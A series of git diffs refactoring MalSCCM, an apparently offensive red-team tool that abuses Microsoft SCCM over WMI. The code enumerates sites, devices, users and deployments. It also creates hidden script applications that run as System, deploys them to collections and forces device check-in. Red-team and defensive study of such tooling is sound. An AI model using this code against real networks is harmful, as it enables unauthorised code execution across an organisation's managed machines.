+        if (arguments.TryGetValue("/user", out var argument3))
         {
-            UserName = arguments["/user"];
+            UserName = argument3;
         }
 
-        if (arguments.ContainsKey("/host"))
+        if (arguments.TryGetValue("/host", out var argument4))
         {
-            DeviceName = arguments["/host"];
+            DeviceName = argument4;
         }
 
         if (!Enum.FbGetSiteScope())
@@ -90,7 +90,6 @@ public class Group : ICommand
             Console.WriteLine("\r\n[*] Action: Adding Device");
             Groups.FbAddDeviceToSCCMCollection();
         }
-
 
         Console.WriteLine("\r\n[*] Group complete\r\n");
     }

--- a/MalSCCM/Commands/ICommand.cs
+++ b/MalSCCM/Commands/ICommand.cs
@@ -4,5 +4,6 @@ namespace MalSCCM.Commands;
 
 public interface ICommand
 {
+    string CommandName { get; }
     void Execute(Dictionary<string, string> arguments);
 }

--- a/MalSCCM/Commands/ICommand.cs
+++ b/MalSCCM/Commands/ICommand.cs
@@ -1,9 +1,8 @@
 ﻿using System.Collections.Generic;
 
-namespace MalSCCM.Commands
+namespace MalSCCM.Commands;
+
+public interface ICommand
 {
-    public interface ICommand
-    {
-        void Execute(Dictionary<string, string> arguments);
-    }
+    void Execute(Dictionary<string, string> arguments);
 }

--- a/MalSCCM/Commands/Inspect.cs
+++ b/MalSCCM/Commands/Inspect.cs
@@ -12,9 +12,9 @@ public class Inspect : ICommand
 
     public void Execute(Dictionary<string, string> arguments)
     {
-        if (arguments.ContainsKey("/server"))
+        if (arguments.TryGetValue("/server", out var argument))
         {
-            ServerName = arguments["/server"];
+            ServerName = argument;
         }
 
         Console.WriteLine("[*] Action: Inspect SCCM Server");
@@ -89,9 +89,6 @@ public class Inspect : ICommand
             Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
             Enum.FbGetSCCMDeployments();
         }
-
-
-
 
         Console.WriteLine("\r\n[*] Inspect complete\r\n");
     }

--- a/MalSCCM/Commands/Inspect.cs
+++ b/MalSCCM/Commands/Inspect.cs
@@ -1,99 +1,98 @@
 ﻿using System;
 using System.Collections.Generic;
 
-namespace MalSCCM.Commands
+namespace MalSCCM.Commands;
+
+public class Inspect : ICommand
 {
-    public class Inspect : ICommand
+
+    public static string CommandName => "inspect";
+    public static string SiteCode = "";
+    public static string ServerName = "localhost";
+
+    public void Execute(Dictionary<string, string> arguments)
     {
-
-        public static string CommandName => "inspect";
-        public static string SiteCode = "";
-        public static string ServerName = "localhost";
-
-        public void Execute(Dictionary<string, string> arguments)
+        if (arguments.ContainsKey("/server"))
         {
-            if (arguments.ContainsKey("/server"))
-            {
-                ServerName = arguments["/server"];
-            }
-
-            Console.WriteLine("[*] Action: Inspect SCCM Server");
-
-            if (!Enum.FbGetSiteScope())
-            {
-                Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
-                if (!Enum.FbGetSiteScope2())
-                {
-                    Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
-                    Enum.FbGetSiteScope3();
-                }
-            }
-
-            if (arguments.ContainsKey("/all"))
-            {
-
-                Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
-                Enum.FbGetSCCMComputer();
-                Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
-                Enum.FbGetSCCMADForest();
-                Console.WriteLine("\r\n[*] Action: Get SCCM Applications");
-                Enum.FbGetSCCMApplication();
-                Console.WriteLine("\r\n[*] Action: Get SCCM Packages");
-                Enum.FbGetSCCMPackage();
-                Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)");
-                Enum.FbGetSCCMCollection();
-                Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users");
-                Enum.FbGetSCCMPrimaryUser();
-                Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
-                Enum.FbGetSCCMDeployments();
-            }
-
-            if (arguments.ContainsKey("/computers"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
-                Enum.FbGetSCCMComputer();
-            }
-
-            if (arguments.ContainsKey("/forest"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
-                Enum.FbGetSCCMADForest();
-            }
-
-            if (arguments.ContainsKey("/applications"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM Applications");
-                Enum.FbGetSCCMApplication();
-            }
-
-            if (arguments.ContainsKey("/packages"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM Packages");
-                Enum.FbGetSCCMPackage();
-            }
-
-            if (arguments.ContainsKey("/groups"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)");
-                Enum.FbGetSCCMCollection();
-            }
-
-            if (arguments.ContainsKey("/primaryusers"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users");
-                Enum.FbGetSCCMPrimaryUser();
-            }
-
-            if (arguments.ContainsKey("/deployments"))
-            {
-                Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
-                Enum.FbGetSCCMDeployments();
-            }
-
-
-
-
-            Console.WriteLine("\r\n[*] Inspect complete\r\n");
+            ServerName = arguments["/server"];
         }
+
+        Console.WriteLine("[*] Action: Inspect SCCM Server");
+
+        if (!Enum.FbGetSiteScope())
+        {
+            Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
+            if (!Enum.FbGetSiteScope2())
+            {
+                Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
+                Enum.FbGetSiteScope3();
+            }
+        }
+
+        if (arguments.ContainsKey("/all"))
+        {
+
+            Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
+            Enum.FbGetSCCMComputer();
+            Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
+            Enum.FbGetSCCMADForest();
+            Console.WriteLine("\r\n[*] Action: Get SCCM Applications");
+            Enum.FbGetSCCMApplication();
+            Console.WriteLine("\r\n[*] Action: Get SCCM Packages");
+            Enum.FbGetSCCMPackage();
+            Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)");
+            Enum.FbGetSCCMCollection();
+            Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users");
+            Enum.FbGetSCCMPrimaryUser();
+            Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
+            Enum.FbGetSCCMDeployments();
+        }
+
+        if (arguments.ContainsKey("/computers"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
+            Enum.FbGetSCCMComputer();
+        }
+
+        if (arguments.ContainsKey("/forest"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
+            Enum.FbGetSCCMADForest();
+        }
+
+        if (arguments.ContainsKey("/applications"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Applications");
+            Enum.FbGetSCCMApplication();
+        }
+
+        if (arguments.ContainsKey("/packages"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Packages");
+            Enum.FbGetSCCMPackage();
+        }
+
+        if (arguments.ContainsKey("/groups"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)");
+            Enum.FbGetSCCMCollection();
+        }
+
+        if (arguments.ContainsKey("/primaryusers"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users");
+            Enum.FbGetSCCMPrimaryUser();
+        }
+
+        if (arguments.ContainsKey("/deployments"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
+            Enum.FbGetSCCMDeployments();
+        }
+
+
+
+
+        Console.WriteLine("\r\n[*] Inspect complete\r\n");
     }
 }

--- a/MalSCCM/Commands/Inspect.cs
+++ b/MalSCCM/Commands/Inspect.cs
@@ -5,8 +5,8 @@ namespace MalSCCM.Commands;
 
 public class Inspect : ICommand
 {
-
-    public static string CommandName => "inspect";
+    public string CommandName => "inspect";
+    
     public static string SiteCode = "";
     public static string ServerName = "localhost";
 

--- a/MalSCCM/Commands/Inspect.cs
+++ b/MalSCCM/Commands/Inspect.cs
@@ -31,7 +31,6 @@ public class Inspect : ICommand
 
         if (arguments.ContainsKey("/all"))
         {
-
             Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
             Enum.FbGetSCCMComputer();
             Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
@@ -46,6 +45,8 @@ public class Inspect : ICommand
             Enum.FbGetSCCMPrimaryUser();
             Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
             Enum.FbGetSCCMDeployments();
+            Console.WriteLine("\r\n[*] Action: Get SCCM Admins");
+            Enum.FbGetSCCMAdmins();
         }
 
         if (arguments.ContainsKey("/computers"))
@@ -88,6 +89,12 @@ public class Inspect : ICommand
         {
             Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
             Enum.FbGetSCCMDeployments();
+        }
+
+        if (arguments.ContainsKey("/admins"))
+        {
+            Console.WriteLine("\r\n[*] Action: Get SCCM Admins");
+            Enum.FbGetSCCMAdmins();
         }
 
         Console.WriteLine("\r\n[*] Inspect complete\r\n");

--- a/MalSCCM/Commands/Locate.cs
+++ b/MalSCCM/Commands/Locate.cs
@@ -12,9 +12,9 @@ public class Locate : ICommand
 
     public void Execute(Dictionary<string, string> arguments)
     {
-        if (arguments.ContainsKey("/server"))
+        if (arguments.TryGetValue("/server", out var argument))
         {
-            ServerName = arguments["/server"];
+            ServerName = argument;
         }
 
         Console.WriteLine("[*] Action: Locating SCCM Management Servers");

--- a/MalSCCM/Commands/Locate.cs
+++ b/MalSCCM/Commands/Locate.cs
@@ -5,8 +5,8 @@ namespace MalSCCM.Commands;
 
 public class Locate : ICommand
 {
-
-    public static string CommandName => "locate";
+    public string CommandName => "locate";
+    
     public static string SiteCode = "";
     public static string ServerName = "localhost";
 

--- a/MalSCCM/Commands/Locate.cs
+++ b/MalSCCM/Commands/Locate.cs
@@ -1,46 +1,45 @@
 ﻿using System;
 using System.Collections.Generic;
 
-namespace MalSCCM.Commands
+namespace MalSCCM.Commands;
+
+public class Locate : ICommand
 {
-    public class Locate : ICommand
+
+    public static string CommandName => "locate";
+    public static string SiteCode = "";
+    public static string ServerName = "localhost";
+
+    public void Execute(Dictionary<string, string> arguments)
     {
-
-        public static string CommandName => "locate";
-        public static string SiteCode = "";
-        public static string ServerName = "localhost";
-
-        public void Execute(Dictionary<string, string> arguments)
+        if (arguments.ContainsKey("/server"))
         {
-            if (arguments.ContainsKey("/server"))
-            {
-                ServerName = arguments["/server"];
-            }
-
-            Console.WriteLine("[*] Action: Locating SCCM Management Servers");
-
-            if (!Enum.FbGetSiteScope())
-            {
-                Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
-                if (!Enum.FbGetSiteScope2())
-                {
-                    Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
-                    Enum.FbGetSiteScope3();
-                }
-            }
-
-            Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation.");
-            Console.WriteLine("[!] Note - You can try use 'inspect /server:<managementserver>' to see if the management server is exploitable.");
-            Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server");
-
-            Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry");
-
-            Enum.FbGetSCCMPrimaryServerRegKey();
-
-            Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!");
-            Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_<sitecode>) will be the name of a share on the primary server.");
-
-            Console.WriteLine("\r\n[*] Locate complete\r\n");
+            ServerName = arguments["/server"];
         }
+
+        Console.WriteLine("[*] Action: Locating SCCM Management Servers");
+
+        if (!Enum.FbGetSiteScope())
+        {
+            Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
+            if (!Enum.FbGetSiteScope2())
+            {
+                Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
+                Enum.FbGetSiteScope3();
+            }
+        }
+
+        Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation.");
+        Console.WriteLine("[!] Note - You can try use 'inspect /server:<managementserver>' to see if the management server is exploitable.");
+        Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server");
+
+        Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry");
+
+        Enum.FbGetSCCMPrimaryServerRegKey();
+
+        Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!");
+        Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_<sitecode>) will be the name of a share on the primary server.");
+
+        Console.WriteLine("\r\n[*] Locate complete\r\n");
     }
 }

--- a/MalSCCM/MalSCCM.csproj
+++ b/MalSCCM/MalSCCM.csproj
@@ -8,9 +8,9 @@
     <OutputType>Exe</OutputType>
     <RootNamespace>MalSCCM</RootNamespace>
     <AssemblyName>MalSCCM</AssemblyName>
-    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <Deterministic>true</Deterministic>
+    <LangVersion>11</LangVersion>
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>

--- a/MalSCCM/Program.cs
+++ b/MalSCCM/Program.cs
@@ -1,10 +1,11 @@
 ﻿using System;
 using System.Collections.Generic;
+
 using MalSCCM.Args;
 
 namespace MalSCCM;
 
-class Program
+public static class Program
 {
     private static void MainExecute(string commandName, Dictionary<string, string> parsedArgs)
     {
@@ -31,6 +32,7 @@ class Program
     {
         // try to parse the command line arguments, show usage on failure and then bail
         var parsed = ArgumentParser.Parse(args);
+
         if (parsed.ParsedOk == false)
         {
             Info.ShowLogo();
@@ -39,8 +41,6 @@ class Program
         }
 
         var commandName = args.Length != 0 ? args[0] : "";
-
         MainExecute(commandName, parsed.Arguments);
-
     }
 }

--- a/MalSCCM/Program.cs
+++ b/MalSCCM/Program.cs
@@ -2,46 +2,45 @@
 using System.Collections.Generic;
 using MalSCCM.Args;
 
-namespace MalSCCM
+namespace MalSCCM;
+
+class Program
 {
-    class Program
+    private static void MainExecute(string commandName, Dictionary<string, string> parsedArgs)
     {
-        private static void MainExecute(string commandName, Dictionary<string, string> parsedArgs)
+        // main execution logic
+
+        Info.ShowLogo();
+
+        try
         {
-            // main execution logic
+            var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs);
 
-            Info.ShowLogo();
-
-            try
-            {
-                var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs);
-
-                // show the usage if no commands were found for the command name
-                if (commandFound == false)
-                    Info.ShowUsage();
-            }
-            catch (Exception e)
-            {
-                Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n");
-                Console.WriteLine(e);
-            }
-        }
-
-        public static void Main(string[] args)
-        {
-            // try to parse the command line arguments, show usage on failure and then bail
-            var parsed = ArgumentParser.Parse(args);
-            if (parsed.ParsedOk == false)
-            {
-                Info.ShowLogo();
+            // show the usage if no commands were found for the command name
+            if (commandFound == false)
                 Info.ShowUsage();
-                return;
-            }
-
-            var commandName = args.Length != 0 ? args[0] : "";
-
-            MainExecute(commandName, parsed.Arguments);
-
         }
+        catch (Exception e)
+        {
+            Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n");
+            Console.WriteLine(e);
+        }
+    }
+
+    public static void Main(string[] args)
+    {
+        // try to parse the command line arguments, show usage on failure and then bail
+        var parsed = ArgumentParser.Parse(args);
+        if (parsed.ParsedOk == false)
+        {
+            Info.ShowLogo();
+            Info.ShowUsage();
+            return;
+        }
+
+        var commandName = args.Length != 0 ? args[0] : "";
+
+        MainExecute(commandName, parsed.Arguments);
+
     }
 }

--- a/MalSCCM/lib/Application.cs
+++ b/MalSCCM/lib/Application.cs
@@ -10,8 +10,8 @@ public static class Application
     {
         try
         {
-            var IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification");
-            var AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application");
+            var IDClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Identification");
+            var AppClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Application");
 
             object[] methodArgs = {null};
 
@@ -83,7 +83,7 @@ public static class Application
         try
         {
             var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'");
-            var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
             var objColl = mgmtSrchr.Get();
@@ -112,11 +112,11 @@ public static class Application
     {
         try
         {
-            var AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment");
+            var AppAssignementClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ApplicationAssignment");
             var TargetCollectionID = Group.TargetCollectionID;
 
             var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'");
-            var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
             var CI_ID = "";
@@ -178,7 +178,7 @@ public static class Application
         try
         {
             var Query = new SelectQuery("Select * FROM SMS_ApplicationAssignment WHERE ApplicationName = '" + App.AppName + "'");
-            var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
             var objColl = mgmtSrchr.Get();

--- a/MalSCCM/lib/Application.cs
+++ b/MalSCCM/lib/Application.cs
@@ -1,21 +1,22 @@
 ﻿using System;
 using System.Management;
 using System.Text;
+
 using MalSCCM.Commands;
 
-public class Application
+public static class Application
 {
     public static bool FbCreateSCCMApplication()
     {
         try
         {
-            ManagementClass IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification");
-            ManagementClass AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application");
+            var IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification");
+            var AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application");
 
             object[] methodArgs = {null};
 
-            object result = IDClass.InvokeMethod("GetSiteID", methodArgs);
-            string scopeid = (string)methodArgs[0];
+            var result = IDClass.InvokeMethod("GetSiteID", methodArgs);
+            var scopeid = (string)methodArgs[0];
             var trimscopeid = "ScopeId_" + scopeid.Trim(new char[] { '{', '}' });
 
             Console.WriteLine("ScopeID: " + trimscopeid);
@@ -27,7 +28,7 @@ public class Application
             var NewFileID = "File_" + Guid.NewGuid();
             Console.WriteLine("NewFileID: " + NewFileID);
 
-            StringBuilder xml = new StringBuilder();
+            var xml = new StringBuilder();
 
             xml.AppendLine(@"<?xml version=""1.0"" encoding=""utf-16""?><AppMgmtDigest xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"" xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance""><Application AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewAppID + @""" Version=""2""><DisplayInfo DefaultLanguage=""en-US""><Info Language=""en-US""><Title>" + App.AppName + @"</Title><Publisher/><Version/></Info></DisplayInfo><DeploymentTypes><DeploymentType AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewDeployID + @""" Version=""2""/></DeploymentTypes><Title ResourceId=""Res_684364143"">" + App.AppName + @"</Title><Description ResourceId=""Res_1018411239""/><Publisher ResourceId=""Res_1340020890""/><SoftwareVersion ResourceId=""Res_597041892""/><CustomId ResourceId=""Res_872061892""/></Application><DeploymentType AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewDeployID + @""" Version=""2""><Title ResourceId=""Res_1244298486"">" + App.AppName + @"</Title><Description ResourceId=""Res_405397997""/><DeploymentTechnology>GLOBAL/ScriptDeploymentTechnology</DeploymentTechnology><Technology>Script</Technology><Hosting>Native</Hosting><Installer Technology=""Script""><ExecutionContext>System</ExecutionContext><DetectAction><Provider>Local</Provider><Args><Arg Name=""ExecutionContext"" Type=""String"">System</Arg><Arg Name=""MethodBody"" Type=""String"">&lt;?xml version=""1.0"" encoding=""utf-16""?&gt;");
             xml.AppendLine(@"&lt;EnhancedDetectionMethod xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest""&gt;");
@@ -58,7 +59,7 @@ public class Application
 
             Console.WriteLine("Creating Instance");
 
-            ManagementObject newInstance = AppClass.CreateInstance();
+            var newInstance = AppClass.CreateInstance();
             
             newInstance["SDMPackageXML"] = xml.ToString();
             newInstance["IsHidden"] = true;
@@ -85,7 +86,7 @@ public class Application
             var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
-            ManagementObjectCollection objColl = mgmtSrchr.Get();
+            var objColl = mgmtSrchr.Get();
 
             foreach (ManagementObject obj in objColl)
             {
@@ -111,7 +112,7 @@ public class Application
     {
         try
         {
-            ManagementClass AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment");
+            var AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment");
             var TargetCollectionID = Group.TargetCollectionID;
 
             var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'");
@@ -119,7 +120,7 @@ public class Application
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
             var CI_ID = "";
-            int CI_IDint = 0;
+            var CI_IDint = 0;
             var CI_UniqueID = "";
 
             foreach (var result in mgmtSrchr.Get())
@@ -131,7 +132,7 @@ public class Application
 
             var Date = DateTime.Now.ToString("yyyyMMddHHmmss") + ".000000+***";
 
-            ManagementObject newInstance = AppAssignementClass.CreateInstance();
+            var newInstance = AppAssignementClass.CreateInstance();
 
             newInstance["ApplicationName"] = App.AppName;
             newInstance["AssignmentName"] = App.AssignmentName;
@@ -180,7 +181,7 @@ public class Application
             var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
-            ManagementObjectCollection objColl = mgmtSrchr.Get();
+            var objColl = mgmtSrchr.Get();
 
             foreach (ManagementObject obj in objColl)
             {
@@ -200,5 +201,4 @@ public class Application
             return false;
         }
     }
-
 }

--- a/MalSCCM/lib/Check.cs
+++ b/MalSCCM/lib/Check.cs
@@ -1,20 +1,21 @@
 ﻿using System;
 using System.Management;
+
 using MalSCCM.Commands;
 
-public class Check
+public static class Check
 {
     public static bool FbSCCMDeviceCheckin()
     {
         try
         {
-            ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation");
-            ManagementBaseObject newInstance = Class.GetMethodParameters("InitiateClientOperation");
+            var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation");
+            var newInstance = Class.GetMethodParameters("InitiateClientOperation");
 
             newInstance["Type"] = 8;
             newInstance["TargetCollectionID"] = Group.TargetCollectionID;
 
-            ManagementBaseObject result = Class.InvokeMethod("InitiateClientOperation",newInstance,null);
+            var result = Class.InvokeMethod("InitiateClientOperation",newInstance,null);
 
             Console.WriteLine("ReturnValue: " + result.GetPropertyValue("ReturnValue"));
             Console.WriteLine("OperationID: " + result.GetPropertyValue("OperationID"));
@@ -22,7 +23,6 @@ public class Check
             Console.WriteLine("Checkin succeeded.");
 
             return true;
-
         }
         catch (Exception e)
         {
@@ -32,5 +32,4 @@ public class Check
             return false;
         }
     }
-
 }

--- a/MalSCCM/lib/Check.cs
+++ b/MalSCCM/lib/Check.cs
@@ -9,7 +9,7 @@ public static class Check
     {
         try
         {
-            var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation");
+            var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ClientOperation");
             var newInstance = Class.GetMethodParameters("InitiateClientOperation");
 
             newInstance["Type"] = 8;

--- a/MalSCCM/lib/Enum.cs
+++ b/MalSCCM/lib/Enum.cs
@@ -1,9 +1,10 @@
 ﻿using System;
 using System.Management;
 using Microsoft.Win32;
+
 using MalSCCM.Commands;
 
-public class Enum
+public static class Enum
 {
     public static bool FbGetSiteScope()
     {
@@ -18,7 +19,6 @@ public class Enum
             {
                 var siteCode = result.GetPropertyValue("Name").ToString();
                 var managementServer = result.GetPropertyValue("CurrentManagementPoint").ToString();
-
                 
                 if (!string.IsNullOrEmpty(siteCode))
                 {
@@ -41,6 +41,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSiteScope2()
     {
         try
@@ -74,12 +75,13 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSiteScope3()
     {
         try
         {
             const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Mobile Client";
-            string assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?");
+            var assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?");
 
             Console.WriteLine("SiteCode: " + assignedsitecode);
             Inspect.SiteCode = assignedsitecode;
@@ -94,6 +96,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMComputer()
     {
         try
@@ -122,6 +125,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMADForest()
     {
         try
@@ -150,6 +154,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMApplication()
     {
         try
@@ -178,6 +183,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMPackage()
     {
         try
@@ -206,6 +212,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMCollection()
     {
         try
@@ -273,6 +280,7 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMDeployments()
     {
         try
@@ -306,16 +314,17 @@ public class Enum
             return false;
         }
     }
+    
     public static bool FbGetSCCMPrimaryServerRegKey()
     {
         try
         {
             const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\DP";
-            string mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?");
-            string siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?");
+            var mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?");
+            var siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?");
 
             const string keyNameID = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Identification";
-            string siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?");
+            var siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?");
 
             Console.WriteLine("Management Server: {0}", mgmtServer);
             Console.WriteLine("Primary Server: {0}", siteServer);
@@ -331,6 +340,4 @@ public class Enum
             return false;
         }
     }
-
-
 }

--- a/MalSCCM/lib/Enum.cs
+++ b/MalSCCM/lib/Enum.cs
@@ -1,5 +1,7 @@
 ﻿using System;
+using System.Linq;
 using System.Management;
+using System.Runtime.Remoting.Metadata.W3cXsd2001;
 using Microsoft.Win32;
 
 using MalSCCM.Commands;
@@ -11,7 +13,7 @@ public static class Enum
         try
         {
             var osQuery = new SelectQuery("SMS_Authority");
-            var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\ccm");
+            var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\ccm");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery);
 
@@ -47,7 +49,7 @@ public static class Enum
         try
         {
             var osQuery = new SelectQuery("SMS_ProviderLocation");
-            var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms");
+            var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms");
             mgmtScope.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery);
 
@@ -102,7 +104,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_R_System");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
